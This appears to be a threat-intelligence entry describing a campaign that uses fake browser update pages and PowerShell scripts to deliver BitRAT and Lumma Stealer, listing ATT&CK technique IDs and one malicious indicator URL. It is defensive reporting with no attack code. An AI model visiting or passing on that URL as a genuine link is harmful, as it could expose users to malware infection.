Description
This report details a malicious campaign where adversaries used fake browser update prompts to lure victims into downloading and executing malware. The infection chain begins with injected malicious JavaScript code on compromised websites that redirect users to pages mimicking legitimate browser update sites. These fake update sites host ZIP archives containing PowerShell scripts responsible for downloading and executing BitRAT and Lumma Stealer malware. The report provides in-depth analysis of the attack flow, payload characteristics, encryption routines, and command-and-control infrastructure leveraged by these malware families.
Date
Published | Created | Modified |
---|---|---|
June 3, 2024, 11:26 a.m. | June 3, 2024, 11:26 a.m. | June 3, 2024, 11:48 a.m. |
Indicators
http://chatgpt-app.cloud/q1Vz6N
Attack Patterns
BitRAT
Lumma Stealer
T1056.004
T1021.004
T1583.001
T1569.002
T1583.003
T1574.002
T1059.005
T1059.001
T1059.007
T1056.001
T1071.001
T1518.001
T1204.002
T1489
T1105
T1219
T1027